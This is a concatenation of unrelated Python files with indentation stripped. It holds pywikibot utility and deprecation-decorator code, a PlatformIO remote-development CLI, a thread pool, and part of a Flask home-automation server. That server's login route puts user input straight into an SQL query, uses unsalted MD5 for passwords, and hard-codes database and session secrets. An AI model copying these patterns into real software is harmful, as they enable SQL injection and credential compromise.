extension = '7z'
else:
extension = ''
if extension == 'bz2':
if isinstance(bz2, ImportError):
raise bz2
return wrap(bz2.BZ2File(filename, mode), 1)
elif extension == 'gz':
return wrap(gzip.open(filename, mode), 0)
elif extension == '7z':
if mode != 'rb':
raise NotImplementedError('It is not possible to write a 7z file.')
try:
process = subprocess.Popen(['7za', 'e', '-bd', '-so', filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=65535)
except OSError:
raise ValueError('7za is not installed or cannot '
'uncompress "{0}"'.format(filename))
else:
stderr = process.stderr.read()
process.stderr.close()
if stderr != b'':
process.stdout.close()
raise OSError(
'Unexpected STDERR output from 7za {0}'.format(stderr))
else:
return process.stdout
else:
# assume it's an uncompressed file
return open(filename, 'rb')
def merge_unique_dicts(*args, **kwargs):
"""
Return a merged dict and make sure that the original dicts had unique keys.
The positional arguments are the dictionaries to be merged. It is also
possible to define an additional dict using the keyword arguments.
"""
args = list(args) + [dict(kwargs)]
conflicts = set()
result = {}
for arg in args:
conflicts |= set(arg.keys()) & set(result.keys())
result.update(arg)
if conflicts:
raise ValueError('Multiple dicts contain the same keys: '
'{0}'.format(', '.join(sorted(unicode(key) for key in conflicts))))
return result
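# Illustrative sketch (not part of the original module):
#     merge_unique_dicts({'a': 1}, {'b': 2}, c=3)   # {'a': 1, 'b': 2, 'c': 3}
#     merge_unique_dicts({'a': 1}, {'a': 2})        # raises ValueError (duplicate key 'a')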
# Decorators
#
# Decorator functions without parameters are _invoked_ differently from
# decorator functions with function syntax. For example, @deprecated causes
# a different invocation to @deprecated().
# The former is invoked with the decorated function as args[0].
# The latter is invoked with the decorator arguments as *args & **kwargs,
# and it must return a callable which will be invoked with the decorated
# function as args[0].
# The following deprecators may support both syntaxes, e.g. @deprecated and
# @deprecated() both work. In order to achieve that, the code inspects
# args[0] to see if it is callable. Therefore, a decorator must not accept
# a single callable as its only argument, as it would then be detected as
# a decorator invoked without any arguments.
def signature(obj):
"""
Safely return function Signature object (PEP 362).
inspect.signature was introduced in 3.3, however backports are available.
In Python 3.3, it does not support all types of callables, and should
not be relied upon. Python 3.4 works correctly.
Any exception calling inspect.signature is ignored and None is returned.
@param obj: Function to inspect
@type obj: callable
@rtype: inspect.Signature or None
"""
try:
return inspect.signature(obj)
except (AttributeError, ValueError):
return None
def add_decorated_full_name(obj, stacklevel=1):
"""Extract full object name, including class, and store in __full_name__.
This must be done on all decorators that are chained together, otherwise
the second decorator will have the wrong full name.
@param obj: An object being decorated
@type obj: object
@param stacklevel: level to use
@type stacklevel: int
"""
if hasattr(obj, '__full_name__'):
return
# The current frame is add_decorated_full_name
# The next frame is the decorator
# The next frame is the object being decorated
frame = sys._getframe(stacklevel + 1)
class_name = frame.f_code.co_name
if class_name and class_name != '<module>':
obj.__full_name__ = (obj.__module__ + '.' +
class_name + '.' +
obj.__name__)
else:
obj.__full_name__ = (obj.__module__ + '.' +
obj.__name__)
def manage_wrapping(wrapper, obj):
"""Add attributes to wrapper and wrapped functions."""
wrapper.__doc__ = obj.__doc__
wrapper.__name__ = obj.__name__
wrapper.__module__ = obj.__module__
wrapper.__signature__ = signature(obj)
if not hasattr(obj, '__full_name__'):
add_decorated_full_name(obj, 2)
wrapper.__full_name__ = obj.__full_name__
# Use the previous wrapper's depth, if it exists
wrapper.__depth__ = getattr(obj, '__depth__', 0) + 1
# Obtain the wrapped object from the previous wrapper
wrapped = getattr(obj, '__wrapped__', obj)
wrapper.__wrapped__ = wrapped
# Increment the number of wrappers
if hasattr(wrapped, '__wrappers__'):
wrapped.__wrappers__ += 1
else:
wrapped.__wrappers__ = 1
def get_wrapper_depth(wrapper):
"""Return depth of wrapper function."""
return wrapper.__wrapped__.__wrappers__ + (1 - wrapper.__depth__)
def add_full_name(obj):
"""
A decorator to add __full_name__ to the function being decorated.
This should be done for all decorators used in pywikibot, as any
decorator that does not add __full_name__ will prevent other
decorators in the same chain from being able to obtain it.
This can be used to monkey-patch decorators in other modules.
e.g.
<xyz>.foo = add_full_name(<xyz>.foo)
@param obj: The function to decorate
@type obj: callable
@return: decorating function
@rtype: function
"""
def outer_wrapper(*outer_args, **outer_kwargs):
"""Outer wrapper.
The outer wrapper may be the replacement function if the decorated
decorator was called without arguments, or the replacement decorator
if the decorated decorator was called with arguments.
@param outer_args: args
@type outer_args: list
@param outer_kwargs: kwargs
@type outer_kwargs: dict
"""
def inner_wrapper(*args, **kwargs):
"""Replacement function.
If the decorator supported arguments, they are in outer_args,
and this wrapper is used to process the args which belong to
the function that the decorated decorator was decorating.
@param args: args passed to the decorated function.
@param kwargs: kwargs passed to the decorated function.
"""
add_decorated_full_name(args[0])
return obj(*outer_args, **outer_kwargs)(*args, **kwargs)
inner_wrapper.__doc__ = obj.__doc__
inner_wrapper.__name__ = obj.__name__
inner_wrapper.__module__ = obj.__module__
inner_wrapper.__signature__ = signature(obj)
# The decorator being decorated may have args, so both
# syntaxes need to be supported.
if (len(outer_args) == 1 and len(outer_kwargs) == 0 and
callable(outer_args[0])):
add_decorated_full_name(outer_args[0])
return obj(outer_args[0])
else:
return inner_wrapper
if not __debug__:
return obj
return outer_wrapper
def issue_deprecation_warning(name, instead, depth, warning_class=None):
"""Issue a deprecation warning."""
if instead:
if warning_class is None:
warning_class = DeprecationWarning
warn(u'{0} is deprecated; use {1} instead.'.format(name, instead),
warning_class, depth + 1)
else:
if warning_class is None:
warning_class = _NotImplementedWarning
warn('{0} is deprecated.'.format(name), warning_class, depth + 1)
@add_full_name
def deprecated(*args, **kwargs):
"""Decorator to output a deprecation warning.
@kwarg instead: if provided, will be used to specify the replacement
@type instead: string
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*args, **kwargs):
"""Replacement function.
@param args: args passed to the decorated function.
@type args: list
@param kwargs: kwargs passed to the decorated function.
@type kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
issue_deprecation_warning(name, instead, depth)
return obj(*args, **kwargs)
def add_docstring(wrapper):
"""Add a Deprecated notice to the docstring."""
deprecation_notice = 'Deprecated'
if instead:
deprecation_notice += '; use ' + instead + ' instead'
deprecation_notice += '.\n\n'
if wrapper.__doc__: # Append old docstring after the notice
wrapper.__doc__ = deprecation_notice + wrapper.__doc__
else:
wrapper.__doc__ = deprecation_notice
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
# Regular expression to find existing deprecation notices
deprecated_notice = re.compile(r'(^|\s)DEPRECATED[.:;,]',
re.IGNORECASE)
# Add the deprecation notice to the docstring if not present
if not wrapper.__doc__:
add_docstring(wrapper)
else:
if not deprecated_notice.search(wrapper.__doc__):
add_docstring(wrapper)
else:
# Get docstring up to @params so deprecation notices for
# parameters don't disrupt it
trim_params = re.compile(r'^.*?((?=@param)|$)', re.DOTALL)
trimmed_doc = trim_params.match(wrapper.__doc__).group(0)
if not deprecated_notice.search(trimmed_doc): # No notice
add_docstring(wrapper)
return wrapper
without_parameters = len(args) == 1 and len(kwargs) == 0 and callable(args[0])
if 'instead' in kwargs:
instead = kwargs['instead']
elif not without_parameters and len(args) == 1:
instead = args[0]
else:
instead = False
# When called as @deprecated, return a replacement function
if without_parameters:
if not __debug__:
return args[0]
return decorator(args[0])
# Otherwise return a decorator, which returns a replacement function
else:
return decorator
def deprecate_arg(old_arg, new_arg):
"""Decorator to declare old_arg deprecated and replace it with new_arg."""
return deprecated_args(**{old_arg: new_arg})
def deprecated_args(**arg_pairs):
"""
Decorator to declare multiple args deprecated.
@param arg_pairs: Each entry points to the new argument name. With True or
None it drops the value and prints a warning. If False it just drops
the value.
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@type __args: list
@param __kwargs: kwargs passed to the decorated function
@type __kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
for old_arg, new_arg in arg_pairs.items():
output_args = {
'name': name,
'old_arg': old_arg,
'new_arg': new_arg,
}
if old_arg in __kw:
if new_arg not in [True, False, None]:
if new_arg in __kw:
warn(u"%(new_arg)s argument of %(name)s "
u"replaces %(old_arg)s; cannot use both."
% output_args,
RuntimeWarning, depth)
else:
# If the value is positionally given this will
# cause a TypeError, which is intentional
warn(u"%(old_arg)s argument of %(name)s "
u"is deprecated; use %(new_arg)s instead."
% output_args,
DeprecationWarning, depth)
__kw[new_arg] = __kw[old_arg]
else:
if new_arg is False:
cls = PendingDeprecationWarning
else:
cls = DeprecationWarning
warn(u"%(old_arg)s argument of %(name)s is deprecated."
% output_args,
cls, depth)
del __kw[old_arg]
return obj(*__args, **__kw)
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
if wrapper.__signature__:
# Build a new signature with deprecated args added.
# __signature__ is only available in Python 3 which has OrderedDict
params = OrderedDict()
for param in wrapper.__signature__.parameters.values():
params[param.name] = param.replace()
for old_arg, new_arg in arg_pairs.items():
params[old_arg] = inspect.Parameter(
old_arg, kind=inspect._POSITIONAL_OR_KEYWORD,
default='[deprecated name of ' + new_arg + ']'
if new_arg not in [True, False, None]
else NotImplemented)
wrapper.__signature__ = inspect.Signature()
wrapper.__signature__._parameters = params
return wrapper
return decorator
def remove_last_args(arg_names):
"""
Decorator to declare all args additionally provided deprecated.
All positional arguments appearing after the normal arguments are marked
deprecated. It marks also all keyword arguments present in arg_names as
deprecated. Any arguments (positional or keyword) which are not present in
arg_names are forwarded. For example, a call with 3 parameters where the
original function accepts one and arg_names contains one name will result
in an error, because the function is then effectively called with 2 parameters.
The decorated function may not use C{*args} or C{**kwargs}.
@param arg_names: The names of all arguments.
@type arg_names: iterable; for the most explanatory message it should
retain the given order (so not a set for example).
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@type __args: list
@param __kwargs: kwargs passed to the decorated function
@type __kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
args, varargs, kwargs, _ = getargspec(wrapper.__wrapped__)
if varargs is not None or kwargs is not None:
raise ValueError('{0} may not have * or ** args.'.format(
name))
deprecated = set(__kw) & set(arg_names)
if len(__args) > len(args):
deprecated.update(arg_names[:len(__args) - len(args)])
# remove at most |arg_names| entries from the back
new_args = tuple(__args[:max(len(args), len(__args) - len(arg_names))])
new_kwargs = dict((arg, val) for arg, val in __kw.items()
if arg not in arg_names)
if deprecated:
# sort them according to arg_names
deprecated = [arg for arg in arg_names if arg in deprecated]
warn(u"The trailing arguments ('{0}') of {1} are deprecated. "
u"The value(s) provided for '{2}' have been dropped.".
format("', '".join(arg_names),
name,
"', '".join(deprecated)),
DeprecationWarning, depth)
return obj(*new_args, **new_kwargs)
manage_wrapping(wrapper, obj)
return wrapper
return decorator
def redirect_func(target, source_module=None, target_module=None,
old_name=None, class_name=None):
"""
Return a function which can be used to redirect to 'target'.
It also acts like marking that function deprecated and copies all
parameters.
@param target: The targeted function which is to be executed.
@type target: callable
@param source_module: The module of the old function. If '.', it defaults
to target_module. If 'None' (default) it tries to guess it from the
calling function's module.
@type source_module: basestring
@param target_module: The module of the target function. If
'None' (default) it tries to get it from the target. Might not work
with nested classes.
@type target_module: basestring
@param old_name: The old function name. If None it uses the name of the
new function.
@type old_name: basestring
@param class_name: The name of the class. It's added to the target and
source module (separated by a '.').
@type class_name: basestring
@return: A new function which adds a warning prior to each execution.
@rtype: callable
"""
def call(*a, **kw):
issue_deprecation_warning(old_name, new_name, 2)
return target(*a, **kw)
if target_module is None:
target_module = target.__module__
if target_module and target_module[-1] != '.':
target_module += '.'
if source_module == '.':
source_module = target_module
elif source_module and source_module[-1] != '.':
source_module += '.'
else:
source_module = sys._getframe(1).f_globals['__name__'] + '.'
if class_name:
target_module += class_name + '.'
source_module += class_name + '.'
old_name = source_module + (old_name or target.__name__)
new_name = target_module + target.__name__
if not __debug__:
return target
return call
class ModuleDeprecationWrapper(types.ModuleType):
"""A wrapper for a module to deprecate classes or variables of it."""
def __init__(self, module):
"""
Initialise the wrapper.
It will automatically overwrite the module with this instance in
C{sys.modules}.
@param module: The module name or instance
@type module: str or module
"""
if isinstance(module, basestring):
module = sys.modules[module]
super(ModuleDeprecationWrapper, self).__setattr__('_deprecated', {})
super(ModuleDeprecationWrapper, self).__setattr__('_module', module)
self.__dict__.update(module.__dict__)
if __debug__:
sys.modules[module.__name__] = self
def _add_deprecated_attr(self, name, replacement=None,
replacement_name=None, warning_message=None):
"""
Add the name to the local deprecated names dict.
@param name: The name of the deprecated class or variable. It may not
be already deprecated.
@type name: str
@param replacement: The replacement value which should be returned
instead. If the name is already an attribute of that module this
must be None. If None it'll return the attribute of the module.
@type replacement: any
@param replacement_name: The name of the new replaced value. Required
if C{replacement} is not None and it has no __name__ attribute.
If it contains a '.', it will be interpreted as a Python dotted
object name, and evaluated when the deprecated object is needed.
@type replacement_name: str
@param warning_message: The warning to display, with positional
variables: {0} = module, {1} = attribute name, {2} = replacement.
@type warning_message: basestring
"""
if '.' in name:
raise ValueError('Deprecated name "{0}" may not contain '
'".".'.format(name))
if name in self._deprecated:
raise ValueError('Name "{0}" is already deprecated.'.format(name))
if replacement is not None and hasattr(self._module, name):
raise ValueError('Module has already an attribute named '
'"{0}".'.format(name))
if replacement_name is None:
if hasattr(replacement, '__name__'):
replacement_name = replacement.__module__
if hasattr(replacement, '__self__'):
replacement_name += '.'
replacement_name += replacement.__self__.__class__.__name__
replacement_name += '.' + replacement.__name__
else:
raise TypeError('Replacement must have a __name__ attribute '
'or a replacement name must be set '
'specifically.')
if not warning_message:
if replacement_name:
warning_message = '{0}.{1} is deprecated; use {2} instead.'
else:
warning_message = u"{0}.{1} is deprecated."
self._deprecated[name] = replacement_name, replacement, warning_message
def __setattr__(self, attr, value):
"""Set the value of the wrapped module."""
self.__dict__[attr] = value
setattr(self._module, attr, value)
def __getattr__(self, attr):
"""Return the attribute with a deprecation warning if required."""
if attr in self._deprecated:
warning_message = self._deprecated[attr][2]
warn(warning_message.format(self._module.__name__, attr,
self._deprecated[attr][0]),
DeprecationWarning, 2)
if self._deprecated[attr][1]:
return self._deprecated[attr][1]
elif '.' in self._deprecated[attr][0]:
try:
package_name = self._deprecated[attr][0].split('.', 1)[0]
module = __import__(package_name)
context = {package_name: module}
replacement = eval(self._deprecated[attr][0], context)
self._deprecated[attr] = (
self._deprecated[attr][0],
replacement,
self._deprecated[attr][2]
)
return replacement
except Exception:
pass
return getattr(self._module, attr)
@deprecated('open_archive()')
def open_compressed(filename, use_extension=False):
"""DEPRECATED: Open a file and uncompress it if needed."""
return open_archive(filename, use_extension=use_extension)
def file_mode_checker(filename, mode=0o600):
"""Check file mode and update it, if needed.
@param filename: filename path
@type filename: basestring
@param mode: requested file mode
@type mode: int
"""
warn_str = 'File {0} had {1:o} mode; converted to {2:o} mode.'
st_mode = os.stat(filename).st_mode
if stat.S_ISREG(st_mode) and (st_mode - stat.S_IFREG != mode):
os.chmod(filename, mode)
# re-read and check changes
if os.stat(filename).st_mode != st_mode:
warn(warn_str.format(filename, st_mode - stat.S_IFREG, mode))
def compute_file_hash(filename, sha='sha1', bytes_to_read=None):
"""Compute file hash.
Result is expressed as hexdigest().
@param filename: filename path
@type filename: basestring
@param sha: hashing function among the following in hashlib:
md5(), sha1(), sha224(), sha256(), sha384(), and sha512();
the function name shall be passed as a string, e.g. 'sha1'.
@type sha: basestring
@param bytes_to_read: only the first bytes_to_read will be considered;
if file size is smaller, the whole file will be considered.
@type bytes_to_read: None or int
"""
size = os.path.getsize(filename)
if bytes_to_read is None:
bytes_to_read = size
else:
bytes_to_read = min(bytes_to_read, size)
step = 1 << 20
shas = ['md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']
assert sha in shas
sha = getattr(hashlib, sha)() # sha instance
with open(filename, 'rb') as f:
while bytes_to_read > 0:
read_bytes = f.read(min(bytes_to_read, step))
assert read_bytes # make sure we actually read bytes
bytes_to_read -= len(read_bytes)
sha.update(read_bytes)
return sha.hexdigest()
|
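The decorator section above (deprecated, deprecated_args) is the most intricate part of the module. A short usage sketch, assuming the file is importable as pywikibot.tools and that deprecation warnings are made visible:

```python
import warnings

from pywikibot.tools import deprecated, deprecated_args  # assumed import path

warnings.simplefilter('default')  # make DeprecationWarning visible


@deprecated(instead='new_max')
def old_max(values):
    return max(values)


@deprecated_args(foo='bar')
def newer(bar=None):
    return bar


old_max([1, 2, 3])  # warns: old_max is deprecated; use new_max instead.
newer(foo=42)       # warns about foo and forwards the value as bar; returns 42
```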
command.py
|
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=too-many-arguments, import-outside-toplevel
# pylint: disable=inconsistent-return-statements
import os
import subprocess
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import fs, proc
from platformio.commands.device import helpers as device_helpers
from platformio.commands.device.command import device_monitor as cmd_device_monitor
from platformio.commands.run.command import cli as cmd_run
from platformio.commands.test.command import cli as cmd_test
from platformio.package.manager.core import inject_contrib_pysite
from platformio.project.exception import NotPlatformIOProjectError
@click.group("remote", short_help="Remote Development")
@click.option("-a", "--agent", multiple=True)
@click.pass_context
def cli(ctx, agent):
ctx.obj = agent
inject_contrib_pysite()
@cli.group("agent", short_help="Start a new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(name, share, working_dir):
from platformio.commands.remote.client.agent_service import RemoteAgentService
RemoteAgentService(name, share, working_dir).connect()
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
from platformio.commands.remote.client.agent_list import AgentListClient
AgentListClient().connect()
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
"--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
@click.pass_obj
def remote_update(agents, only_check, dry_run):
from platformio.commands.remote.client.update_core import UpdateCoreClient
UpdateCoreClient("update", agents, dict(only_check=only_check or dry_run)).connect()
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_run(
ctx,
agents,
environment,
target,
upload_port,
project_dir,
disable_auto_clean,
force_remote,
silent,
verbose,
):
from platformio.commands.remote.client.run_or_test import RunOrTestClient
cr = RunOrTestClient(
"run",
agents,
dict(
environment=environment,
target=target,
upload_port=upload_port,
project_dir=project_dir,
disable_auto_clean=disable_auto_clean,
force_remote=force_remote,
silent=silent,
verbose=verbose,
),
)
if force_remote:
return cr.connect()
click.secho("Building project locally", bold=True)
local_targets = []
if "clean" in target:
local_targets = ["clean"]
elif set(["buildfs", "uploadfs", "uploadfsota"]) & set(target):
local_targets = ["buildfs"]
else:
local_targets = ["checkprogsize", "buildprog"]
ctx.invoke(
cmd_run,
environment=environment,
target=local_targets,
project_dir=project_dir,
# disable_auto_clean=True,
silent=silent,
verbose=verbose,
)
if any(["upload" in t for t in target] + ["program" in target]):
click.secho("Uploading firmware remotely", bold=True)
cr.options["target"] += ("nobuild",)
cr.options["disable_auto_clean"] = True
cr.connect()
return True
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_test(
ctx,
agents,
environment,
ignore,
upload_port,
test_port,
project_dir,
force_remote,
without_building,
without_uploading,
verbose,
):
from platformio.commands.remote.client.run_or_test import RunOrTestClient
cr = RunOrTestClient(
"test",
agents,
dict(
environment=environment,
ignore=ignore,
upload_port=upload_port,
test_port=test_port,
project_dir=project_dir,
force_remote=force_remote,
without_building=without_building,
without_uploading=without_uploading,
verbose=verbose,
),
)
if force_remote:
return cr.connect()
click.secho("Building project locally", bold=True)
ctx.invoke(
cmd_test,
environment=environment,
ignore=ignore,
project_dir=project_dir,
without_uploading=True,
without_testing=True,
verbose=verbose,
)
click.secho("Testing project remotely", bold=True)
cr.options["without_building"] = True
cr.connect()
return True
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
@click.pass_obj
def device_list(agents, json_output):
from platformio.commands.remote.client.device_list import DeviceListClient
DeviceListClient(agents, json_output).connect()
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
"--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
"--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)",
)
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)",
)
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
"-e",
"--environment",
help="Load configuration from `platformio.ini` and specified environment",
)
@click.option(
"--sock",
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.pass_obj
@click.pass_context
def device_monitor(ctx, agents, **kwargs):
from platformio.commands.remote.client.device_monitor import DeviceMonitorClient
if kwargs["sock"]:
return DeviceMonitorClient(agents, **kwargs).connect()
project_options = {}
try:
with fs.cd(kwargs["project_dir"]):
project_options = device_helpers.get_project_options(kwargs["environment"])
kwargs = device_helpers.apply_project_monitor_options(kwargs, project_options)
except NotPlatformIOProjectError:
pass
kwargs["baud"] = kwargs["baud"] or 9600
def _tx_target(sock_dir):
subcmd_argv = ["remote"]
for agent in agents:
subcmd_argv.extend(["--agent", agent])
subcmd_argv.extend(["device", "monitor"])
subcmd_argv.extend(device_helpers.options_to_argv(kwargs, project_options))
subcmd_argv.extend(["--sock", sock_dir])
subprocess.call([proc.where_is_program("platformio")] + subcmd_argv)
sock_dir = mkdtemp(suffix="pio")
sock_file = os.path.join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir,))
t.start()
while t.is_alive() and not os.path.isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
with open(sock_file, encoding="utf8") as fp:
kwargs["port"] = fp.read()
ctx.invoke(cmd_device_monitor, **kwargs)
t.join(2)
finally:
fs.rmtree(sock_dir)
return True
|
worker.py
|
# vim: set ts=2 sw=2 tw=99 noet:
import threading
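# Minimal thread pool: RunJobs() deals the job list out round-robin across the
# workers, runs each worker's share on its own thread, and returns a list of
# {'job': ..., 'e': ...} entries for the jobs that raised an exception.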
class Worker:
def __call__(self):
while len(self.jobs):
try:
job = self.jobs.pop()
job.run()
except KeyboardInterrupt as ki:
return
except Exception as e:
self.e = e
self.failedJob = job
class WorkerPool:
def __init__(self, numWorkers):
self.numWorkers = numWorkers
self.workers = []
for i in range(0, self.numWorkers):
self.workers.append(Worker())
def RunJobs(self, jobs):
for w in self.workers:
w.failedJob = None
w.e = None
w.jobs = []
w.thread = threading.Thread(target = w)
#Divvy up jobs
num = 0
for i in jobs:
self.workers[num].jobs.append(i)
num = num + 1
if num == self.numWorkers:
num = 0
#Start up each thread
for w in self.workers:
w.thread.start()
#Wait for threads to finish
failed = []
for w in self.workers:
w.thread.join()
if w.failedJob != None or w.e != None:
failed.append({'job': w.failedJob, 'e': w.e})
return failed
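# Illustrative usage (a sketch only; it assumes job objects expose a run()
# method, as Worker.__call__ requires -- BuildJob is a hypothetical example):
#
#   pool = WorkerPool(4)
#   failed = pool.RunJobs([BuildJob(target) for target in targets])
#   for f in failed:
#       print(f['job'], f['e'])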
|
domotica_server.py
|
# -*- coding: utf-8 -*-
import serial
import time
from flask import request
from flask import jsonify
import os
from flaskext.mysql import MySQL
import subprocess
import hashlib
import pyglet
import time
import json as JSON
from subprocess import Popen, PIPE, STDOUT
import collections
import datetime
import locale
import thread,threading
from flask_cors import CORS, cross_origin
import sys
import signal
from picamera import PiCamera
from flask_session import Session
from sqlalchemy import create_engine
import sqlalchemy.pool as pool
#from espeak import espeak
from flask import Flask, render_template, session, redirect, url_for
app = Flask(__name__)
cors = CORS(app, resources={r"/*": {"origins": "*"}})
#mysql= MySQL()
alarm_state = 0
#app.config['MYSQL_DATABASE_USER'] = 'root'
#app.config['MYSQL_DATABASE_PASSWORD'] = '1238'
#app.config['MYSQL_DATABASE_DB'] = 'domo_home'
#app.config['MYSQL_DATABASE_HOST'] = 'localhost'
#mysql.init_app(app)
engine = create_engine('mysql+pymysql://root:mypass@localhost/domo_home?charset=utf8',pool_size=5, max_overflow=10)
global conn
#con= mysql.connect()
global mypool
global temperatura
app.secret_key = '987321654011'
app.config['SESSION_TYPE'] = 'filesystem'
app.config['SECRET_KEY'] = '987321654011'
app.config.from_object(__name__)
Session(app)
reload(sys)
global ser
global th1
task_lights_on=False
task_lights_off=False
time_lights_on=""
time_lights_off=""
thread_on=True
global daemon_alarm_actived
appliance_task=0
temperatura="0";
try:
#ser = serial.Serial(port='/dev/ttyACM0', baudrate = 9600, parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=2)
ser = serial.Serial('/dev/ttyACM0',9600,timeout=2)
#serial.Serial(port='/dev/ttyACM0',parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS,timeout=1)
except:
print "serial not connected"
camera = PiCamera()
#VIEWS
@app.route("/session")
def SessionControl():
if session.get('logged_in') != True:
print("if Session")
return redirect(url_for('login'))#redirect("http://localhost:5000/login", code=302)
@app.route("/")
def home():
#return render_template('dashboard.html')
if session.get('logged_in') == True:
print("is logged")
return redirect(url_for('dashboard'))
return render_template('login.html')
@app.route("/login")
def login_get():
print("login")
if session.get('logged_in') == True:
print("is logged")
return redirect(url_for('dashboard'))
return render_template('login.html')
@app.route("/login", methods=['POST'])
def login():
if session.get('logged_in') == True:
return redirect(url_for('dashboard'))
conn = engine.connect()
user=request.form['user']
password=request.form['pass']
h=hashlib.md5(password.encode())
# query="select * from user where user = '{user}' and password = '{password}'".format(user=user,password=h.hexdigest())
query="select * from user u inner join role r on u.role_id = r.id where u.status = {activo} and u.user = '{user}' and u.password = '{password}'".format(activo=1,user=user,password=h.hexdigest())
# query="select * from user u inner join role r on u.role_id = r.id where u.user = '{user}'".format(user=user) #and u.password = '{password}'".format(user=user,password=h.hexdigest())
result = conn.execute(query)
#data=cursor.fetchall()
userLogged = ""
userRole = ""
for row in result:
userLogged = row[1]
userRole = row[13]
msg = collections.OrderedDict()
conn.close()
print(result)
if userLogged!="":
session['logged_in'] = True
session['userLogged'] = userLogged
session['userRole'] = userRole #probar roles
msg['status'] = 1
msg['msg'] = 'Usuario ingresado correctamente.'
else:
msg['status'] = 0
msg['msg'] = 'Usuario o contraseña incorrecta, está inactivo, o no cuenta con los permisos. Contacte con el Administrador.'
res = JSON.dumps(msg)
return res
@app.route("/logout")
def logout():
session['logged_in'] = False
session.clear()
return redirect(url_for('login'))
@app.route("/dashboard")
def dashboard():
if session.get('logged_in') != True:
print("if Session")
print(session)
